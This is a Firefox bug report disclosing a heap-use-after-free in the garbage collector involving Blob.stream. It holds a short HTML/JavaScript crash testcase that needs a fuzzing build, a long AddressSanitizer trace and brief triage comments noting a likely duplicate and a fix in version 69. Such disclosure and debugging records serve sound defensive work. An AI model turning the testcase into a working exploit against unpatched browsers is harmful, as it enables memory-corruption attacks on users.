heap-use-after-free in GC with Blob.stream
Categories
(Core :: DOM: File, defect)
Tracking
()
| Tracking | Status | |
|---|---|---|
| firefox69 | --- | fixed |
People
(Reporter: nils, Unassigned)
References
(Regression)
Details
(4 keywords, Whiteboard: [adv-main69-])
Attachments
(2 files)
The following testcase crashes the latest ASAN build of Firefox 69.0a1 (SourceStamp=42a9ef2a777fb841ab9918e10e2629902c7bd28e).It requires a fuzzing build (--enable-fuzzing) and the pref user_pref("fuzzing.enabled",true).
crash.html:
<script>
function start() {
reloadurl=location.href;
o250=new Blob([undefined], {'type': 'image/svg+xml'});
document.location.hash='id4';
o51=o250'stream';
o250=null;
o51=null;
FuzzingFunctions.garbageCollect();FuzzingFunctions.cycleCollect();FuzzingFunctions.garbageCollect();FuzzingFunctions.cycleCollect();
window.top.setTimeout("window.top.location.href='"+reloadurl+"'",400);
}
</script>
<body onload="start()"></body>
ASAN output:
==22790==ERROR: AddressSanitizer: heap-use-after-free on address 0x6030002b8d18 at pc 0x7f0b3b716ec3 bp 0x7ffe26e817c0 sp 0x7ffe26e817b8
READ of size 8 at 0x6030002b8d18 thread T0 (file:// Content)
#0 0x7f0b3b716ec2 in operator bool /builds/worker/workspace/build/src/obj-firefox/dist/include/js/RootingAPI.h:339:56
#1 0x7f0b3b716ec2 in TraceEdge<JSObject > /builds/worker/workspace/build/src/obj-firefox/dist/include/js/TracingAPI.h:391
#2 0x7f0b3b716ec2 in JsGcTracer::Trace(JS::Heap<JSObject>, char const, void*) const /builds/worker/workspace/build/src/xpcom/base/CycleCollectedJSRuntime.cpp:961
#3 0x7f0b3b6f30f9 in mozilla::CycleCollectedJSRuntime::TraceNativeGrayRoots(JSTracer*) /builds/worker/workspace/build/src/xpcom/base/CycleCollectedJSRuntime.cpp:1000:13
#4 0x7f0b4bd8c7b1 in markGrayRoots<js::gc::SweepGroupZonesIter> /builds/worker/workspace/build/src/js/src/gc/GC.cpp:4703:7
#5 0x7f0b4bd8c7b1 in js::gc::GCRuntime::markGrayReferencesInCurrentGroup(js::FreeOp*, js::SliceBudget&) /builds/worker/workspace/build/src/js/src/gc/GC.cpp:5534
#6 0x7f0b4be05f5e in sweepaction::SweepActionSequence<js::gc::GCRuntime*, js::FreeOp*, js::SliceBudget&>::run(js::gc::GCRuntime*, js::FreeOp*, js::SliceBudget&) /builds/worker/workspace/build/src/js/src/gc/GC.cpp:6545:23
#7 0x7f0b4be075b7 in sweepaction::SweepActionRepeatFor<js::gc::SweepGroupsIter, JSRuntime*, js::gc::GCRuntime*, js::FreeOp*, js::SliceBudget&>::run(js::gc::GCRuntime*, js::FreeOp*, js::SliceBudget&) /builds/worker/workspace/build/src/js/src/gc/GC.cpp:6605:19
#8 0x7f0b4bd9df2b in js::gc::GCRuntime::performSweepActions(js::SliceBudget&) /builds/worker/workspace/build/src/js/src/gc/GC.cpp:6777:24
#9 0x7f0b4bda3762 in js::gc::GCRuntime::incrementalSlice(js::SliceBudget&, JS::GCReason, js::gc::AutoGCSession&) /builds/worker/workspace/build/src/js/src/gc/GC.cpp:7306:11
#10 0x7f0b4bda6547 in js::gc::GCRuntime::gcCycle(bool, js::SliceBudget, JS::GCReason) /builds/worker/workspace/build/src/js/src/gc/GC.cpp:7686:3
#11 0x7f0b4bda9ab8 in js::gc::GCRuntime::collect(bool, js::SliceBudget, JS::GCReason) /builds/worker/workspace/build/src/js/src/gc/GC.cpp:7866:9
#12 0x7f0b4bdb389a in gc /builds/worker/workspace/build/src/js/src/gc/GC.cpp:7954:3
#13 0x7f0b4bdb389a in JS::NonIncrementalGC(JSContext*, JSGCInvocationKind, JS::GCReason) /builds/worker/workspace/build/src/js/src/gc/GC.cpp:8792
#14 0x7f0b402b09fd in nsJSContext::GarbageCollectNow(JS::GCReason, nsJSContext::IsIncremental, nsJSContext::IsShrinking, long) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1137:5
#15 0x7f0b42cb2d08 in mozilla::dom::FuzzingFunctions_Binding::garbageCollect(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/FuzzingFunctionsBinding.cpp:42:3
#16 0x7f0b4acd9e87 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448:13
#17 0x7f0b4acd9e87 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:540
#18 0x7f0b4acba49e in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:599:10
#19 0x7f0b4acba49e in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3088
#20 0x7f0b4aca3d68 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:425:10
#21 0x7f0b4acda98f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:568:13
#22 0x7f0b4acdcbb2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:611:8
#23 0x7f0b4b9697b8 in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2661:10
#24 0x7f0b4298a4ce in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:267:37
#25 0x7f0b43c9dc6c in Call<nsCOMPtr<mozilla::dom::EventTarget> > /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
#26 0x7f0b43c9dc6c in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:205
#27 0x7f0b43c4cfe9 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1030:22
#28 0x7f0b43c4eeb7 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1222:17
#29 0x7f0b43c2f7d1 in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:353:5
#30 0x7f0b43c2f7d1 in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:349
#31 0x7f0b43c2da06 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:551:16
#32 0x7f0b43c34774 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1047:11
#33 0x7f0b46c4439f in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1154:7
#34 0x7f0b49af20f3 in nsDocShell::EndPageLoad(nsIWebProgress, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6683:20
#35 0x7f0b49af10e2 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6483:7
#36 0x7f0b49af6c17 in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
#37 0x7f0b3e57f715 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1337:3
#38 0x7f0b3e57e30a in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:896:14
#39 0x7f0b3e578950 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:730:9
#40 0x7f0b3e57c1c5 in nsDocLoader::OnStopRequest(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:618:5
#41 0x7f0b3e57de54 in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp
#42 0x7f0b3bcb64b1 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:568:22
#43 0x7f0b3fe7ae28 in DoUnblockOnload /builds/worker/workspace/build/src/dom/base/Document.cpp:10712:18
#44 0x7f0b3fe7ae28 in mozilla::dom::Document::UnblockOnload(bool) /builds/worker/workspace/build/src/dom/base/Document.cpp:10644
#45 0x7f0b3feb08d5 in mozilla::dom::Document::DispatchContentLoadedEvents() /builds/worker/workspace/build/src/dom/base/Document.cpp:7147:3
#46 0x7f0b3ffc97eb in applyImpl<mozilla::dom::Document, void (mozilla::dom::Document::)()> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1124:12
#47 0x7f0b3ffc97eb in apply<mozilla::dom::Document, void (mozilla::dom::Document::)()> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1130
#48 0x7f0b3ffc97eb in mozilla::detail::RunnableMethodImpl<mozilla::dom::Document*, void (mozilla::dom::Document::)(), true, (mozilla::RunnableKind)0>::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1176
#49 0x7f0b3b93c9b5 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:295:32
#50 0x7f0b3b97d8fc in nsThread::ProcessNextEvent(bool, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1225:14
#51 0x7f0b3b985784 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
#52 0x7f0b3cd8de3f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:88:21
#53 0x7f0b3cc6533e in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
#54 0x7f0b3cc6533e in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
#55 0x7f0b3cc6533e in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
#56 0x7f0b4638bef3 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
#57 0x7f0b4a9fbc9e in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:919:20
#58 0x7f0b3cc6533e in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
#59 0x7f0b3cc6533e in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
#60 0x7f0b3cc6533e in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
#61 0x7f0b4a9fa7e1 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:754:34
#62 0x558655fd0fd3 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
#63 0x558655fd0fd3 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:267
#64 0x7f0b60910b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
#65 0x558655ef250c in _start (/home/nils/browser/firefox/firefox/firefox+0x4550c)
0x6030002b8d18 is located 24 bytes inside of 32-byte region [0x6030002b8d00,0x6030002b8d20)
freed by thread T0 (file:// Content) here:
#0 0x558655f9dba2 in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:124:3
#1 0x7f0b3b76a478 in MaybeKillObject /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2429:29
#2 0x7f0b3b76a478 in SnowWhiteKiller::Visit(nsPurpleBuffer&, nsPurpleBufferEntry*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2459
#3 0x7f0b3b73e0b3 in void nsPurpleBuffer::VisitEntries<SnowWhiteKiller>(SnowWhiteKiller&) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:956:27
#4 0x7f0b3b73f7d8 in nsCycleCollector::FreeSnowWhiteWithBudget(js::SliceBudget&) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2624:14
#5 0x7f0b3dec6f3c in AsyncFreeSnowWhite::Run() /builds/worker/workspace/build/src/js/xpconnect/src/XPCJSRuntime.cpp:146:9
#6 0x7f0b3b9a1782 in IdleRunnableWrapper::Run() /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:331:22
#7 0x7f0b3b97d8fc in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1225:14
#8 0x7f0b3b985784 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
#9 0x7f0b3cd8de3f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:88:21
#10 0x7f0b3cc6533e in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
#11 0x7f0b3cc6533e in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
#12 0x7f0b3cc6533e in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
#13 0x7f0b4638bef3 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
#14 0x7f0b4a9fbc9e in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:919:20
#15 0x7f0b3cc6533e in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
#16 0x7f0b3cc6533e in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
#17 0x7f0b3cc6533e in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
#18 0x7f0b4a9fa7e1 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:754:34
#19 0x558655fd0fd3 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
#20 0x558655fd0fd3 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:267
#21 0x7f0b60910b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
previously allocated by thread T0 (file:// Content) here:
#0 0x558655f9df23 in __interceptor_malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
#1 0x558655fd2c8d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:52:15
#2 0x7f0b43d79324 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/cxxalloc.h:33:10
#3 0x7f0b43d79324 in mozilla::dom::Blob::Stream(JSContext*, JS::MutableHandle<JSObject*>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/file/Blob.cpp:353
#4 0x7f0b4063a787 in mozilla::dom::Blob_Binding::stream(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Blob*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/BlobBinding.cpp:745:24
#5 0x7f0b433b2aa2 in bool mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions>(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3171:13
#6 0x7f0b4acd9e87 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448:13
#7 0x7f0b4acd9e87 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:540
#8 0x7f0b4acba49e in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:599:10
#9 0x7f0b4acba49e in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3088
#10 0x7f0b4aca3d68 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:425:10
#11 0x7f0b4acda98f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:568:13
#12 0x7f0b4acdcbb2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:611:8
#13 0x7f0b4b9697b8 in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2661:10
#14 0x7f0b4298a4ce in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:267:37
#15 0x7f0b43c9dc6c in Call<nsCOMPtr<mozilla::dom::EventTarget> > /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
#16 0x7f0b43c9dc6c in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:205
#17 0x7f0b43c4cfe9 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1030:22
#18 0x7f0b43c4eeb7 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1222:17
#19 0x7f0b43c2f7d1 in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:353:5
#20 0x7f0b43c2f7d1 in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:349
#21 0x7f0b43c2da06 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:551:16
#22 0x7f0b43c34774 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1047:11
#23 0x7f0b46c4439f in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1154:7
#24 0x7f0b49af20f3 in nsDocShell::EndPageLoad(nsIWebProgress, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6683:20
#25 0x7f0b49af10e2 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6483:7
#26 0x7f0b49af6c17 in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
#27 0x7f0b3e57f715 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1337:3
#28 0x7f0b3e57e30a in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:896:14
#29 0x7f0b3e578950 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:730:9
#30 0x7f0b3e57c1c5 in nsDocLoader::OnStopRequest(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:618:5
#31 0x7f0b3e57de54 in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp
#32 0x7f0b3bcb64b1 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:568:22
#33 0x7f0b3fe7ae28 in DoUnblockOnload /builds/worker/workspace/build/src/dom/base/Document.cpp:10712:18
#34 0x7f0b3fe7ae28 in mozilla::dom::Document::UnblockOnload(bool) /builds/worker/workspace/build/src/dom/base/Document.cpp:10644
#35 0x7f0b3feb08d5 in mozilla::dom::Document::DispatchContentLoadedEvents() /builds/worker/workspace/build/src/dom/base/Document.cpp:7147:3
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/obj-firefox/dist/include/js/RootingAPI.h:339:56 in operator bool
Shadow bytes around the buggy address:
0x0c068004f150: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
0x0c068004f160: fd fa fa fa fd fd fd fd fa fa fd fd fd fd fa fa
0x0c068004f170: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
0x0c068004f180: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
0x0c068004f190: fd fa fa fa 00 00 00 00 fa fa fd fd fd fd fa fa
=>0x0c068004f1a0: fd fd fd[fd]fa fa 00 00 05 fa fa fa fd fd fd fa
0x0c068004f1b0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd
0x0c068004f1c0: fd fd fa fa 00 00 00 01 fa fa fd fd fd fd fa fa
0x0c068004f1d0: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa
0x0c068004f1e0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd
0x0c068004f1f0: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==22790==ABORTING
|
||
Comment 2•6 years ago
|
||
Baku, is this a dupe of that other bug?
|
||
Comment 4•6 years ago
|
||
Yes. It looks like.
|
||
Updated•5 years ago
|
|
||
Updated•5 years ago
|
|
|
||
Updated•5 years ago
|
|
||
Updated•5 years ago
|
|
||
Updated•3 years ago
|
|
|
||
Updated•2 years ago
|
|
||
Updated•8 months ago
|
Description
•